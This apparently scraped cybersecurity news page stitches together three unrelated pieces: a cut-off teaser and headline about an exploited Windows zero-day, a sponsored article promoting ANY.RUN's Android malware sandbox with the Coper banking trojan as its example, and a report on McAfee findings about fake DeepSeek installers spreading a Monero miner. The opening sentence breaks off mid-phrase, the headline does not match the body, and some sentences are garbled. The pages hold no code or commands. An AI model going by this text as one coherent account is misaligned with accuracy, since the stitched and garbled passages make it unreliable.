The zero-day vulnerability, tracked by Trend Micro's Zero Day Initiative (ZDI) as ZDI-CAN-25373, refers to an issue that allows bad actors to execute hidden

Unpatched Windows Zero-Day Flaw Exploited by 11 State-Sponsored Threat Groups Since 2017

Disclosure: This article was provided by ANY.RUN. The information and analysis presented are based on their research and findings.

With Android devices deeply embedded in business operations, it’s no surprise that cybercriminals are increasingly targeting them.

Businesses are now prime targets, facing threats like banking trojans, spyware, ransomware, and ad fraud, all designed to steal sensitive company data, compromise financial systems, and disrupt operations.

The problem is, that many security tools aren’t built to catch these threats fast enough, leaving people and businesses vulnerable.

To help with this, ANY.RUN has added Android OS support to its interactive sandbox. Cybersecurity professionals can now run and analyze APK files in real-time, spot threats more quickly, and get a much clearer picture of what a malicious app is doing.

**Key Benefits for Cybersecurity Professionals**

Android OS support enhances security teams’ efficiency in several ways:

*   **Simplifies malware analysis:** Users can analyze Android threats, with detailed insights into network traffic, behavioural indicators, and file execution logs. 

*   **Accelerates incident response:** The interactive sandbox allows for real-time detection and mitigation of Android malware, reducing the time needed for investigations.

*   **Reduces costs and complexity:** Security teams don’t need to juggle multiple tools. Sandboxes like ANY.RUN consolidate everything into one platform, improving efficiency and lowering operational costs.

*   **Enhances SOC workflows:** Tier 1 analysts can quickly escalate cases to Tier 2 with comprehensive forensic data on Android malware, streamlining threat intelligence and response processes.

****How Android OS Inside Virtual Machine Makes Malware Analysis Easier****

Analyzing Android malware inside ANY.RUN’s sandbox is as easy as investigating threats on Windows or Linux. With the latest update, security professionals can interact with and examine Android malware in real time, making the process faster and more intuitive.

Before launching an analysis, users can select Android OS from the standard operating system menu. Once selected, they upload the APK file and begin the investigation. 

_Android OS option inside ANY.RUN sandbox_

Since ANY.RUN’s sandbox is fully interactive, analysts can engage with the malicious file as if they were running it on a real Android device.

In a real analysis session, you can see firsthand how easy it is to interact with a suspicious APK file inside ANY.RUN’s interactive sandbox. 

Let’s take Coper, for example – a well-known Android banking trojan designed to steal financial data, intercept SMS messages, and execute commands remotely. This malware often disguises itself as legitimate banking or financial apps, tricking users into granting permissions that allow full control over the device.

View analysis session with Coper

The fastest way to determine if a file is malicious is by checking the top right corner of the screen, where ANY.RUN automatically highlights suspicious activity. 

In our case, it’s marked in red, immediately alerting us that the sample is dangerous. The sandbox identifies that we are dealing with Coper, confirming that this APK is actively performing harmful actions.

_Malicious activity detected by ANY.RUN sandbox_

To dive deeper, analysts can inspect all processes in the Process Tree section. This view provides a structured breakdown of how the malware operates, making it easier to understand what actions it takes after execution. 

This allows SOC teams, malware analysts, and threat hunters to quickly assess the impact of a threat without wasting time on manual investigation.

Tree of processes inside ANY.RUN sandbox

Another crucial feature is the ATT&CK Matrix section, where you can see exactly what techniques and tactics the malware is using. This makes it much easier to map threats to real-world attack patterns. 

If more details are needed, users can simply click on any specific tactic or technique to get a detailed explanation of how it works and what risks it poses.

_Mitre ATT&CK Matrix techniques and tactics_

Finally, for a more structured breakdown, ANY.RUN provides a text report that compiles all findings into a well-organized format. 

This is especially useful for sharing insights with the team, documenting the investigation, or conducting a deeper analysis later on. 

Instead of manually piecing together information from different sources, security teams get a clear, detailed report that speeds up decision-making and incident response.

_Detailed report of analysis generated by ANY.RUN sandbox_

****Analyze Android Threats Faster in a Secure Environment****

With ANY.RUN’s new Android OS sandbox, cybersecurity professionals can now analyze APK files faster and more efficiently in a secure, interactive environment. 

Whether you’re investigating malware for incident response, threat hunting, or research, this update makes the process quicker, more intuitive, and highly effective.

*   **Faster detection:** Get real-time alerts on suspicious activity without delays.

*   **Easier analysis:** Interact with malware just like you would on a real device and inspect its behaviour effortlessly.

*   **Better collaboration:** Share structured reports with your team, helping everyone stay informed and respond quickly to threats.

Analyze Mobile Threats Faster: ANY.RUN Introduces Android OS to Its Interactive Sandbox

Cybercriminals exploit AI hype with SEO poisoning, tricking users into downloading malware disguised as DeepSeek software, warns McAfee Labs in a new report.

The rise of Artificial Intelligence (AI) has undeniably transformed various sectors, with tools like ChatGPT, DeepSeek and Gemini becoming household names. However, this advancement has also created an environment where scammers can thrive.

McAfee Labs has uncovered a concerning trend where malicious actors are exploiting the popularity of AI tools, to distribute malware. This tactic, often referred to as SEO poisoning, exploits trending search terms to lure unsuspecting users to malicious websites.

The recent surge in interest surrounding DeepSeek-R1, a cost-effective AI model released under an open-source license an AI model and its subsequent chatbot launch, provided a solid platform for such exploitation.

This increasing interest, coupled with occasional website unavailability due to high traffic, created an ideal scenario for scammers. They take advantage of the “excitement, anxiety, and impatience” of users by distributing malware disguised as DeepSeek installers, McAfee researchers noted in the blog post shared with Hackread.com.

The attack starts with a user’s search, after which they are directed to websites offering DeepSeek applications for Windows, Mac, and Android. These websites, however, are malicious, leading to the download of malware, fake installers that bundle unwanted third-party software, and fraudulent captcha pages.

Attack Vector (Source: McAfee)

****Fake DeekSeek Installers, Websites and Apps****

McAfee Labs identified several malware campaigns associated with DeepSeek, including fake installers, impersonator websites, and fake mobile apps. These campaigns distributed various types of malware, such as keyloggers, crypto miners, and password stealers. One notable example involved fake installers that bundled legitimate software with unwanted third-party applications, generating revenue through pay-per-install programs.

Another tactic observed was the use of fake captcha pages, designed to trick users into downloading and executing malicious software. These pages employed “brand impersonation,” mimicking DeepSeek’s branding to appear legitimate. Upon registering for a fake partnership program, users were redirected to these captcha pages, which then prompted them to execute commands that installed malware capable of stealing sensitive information.

One of the fake DeepSeek AI websites, malicious winManager (left) and Audacity software (right) and Android app involved in the malware scam (Screenshot credit: McAfee)

****Monero Miner Behind Fake DeepSeek Installer****

A technical analysis of a crypto miner disguised as DeepSeek software revealed that after installation the malware communicated with a command-and-control server to download and execute a PowerShell script. This script employed process injection techniques to evade detection and establish persistence in the victim’s system. The payload, identified as XMRig mining software, then initiated a Monero mining operation, utilizing a portion of the system’s CPU resources.

Scammers chose Monero probably due to its emphasis on anonymity, making it difficult to trace the flow of funds. This highlights the attackers’ focus on covert operations and maximizing their gains while minimizing the risk of detection.

McAfee Labs emphasizes the importance of staying alert and informed, especially during hype cycles surrounding emerging technologies. Another step toward safety is scanning suspicious links and files on VirusTotal before opening or executing them.

Tag

#windows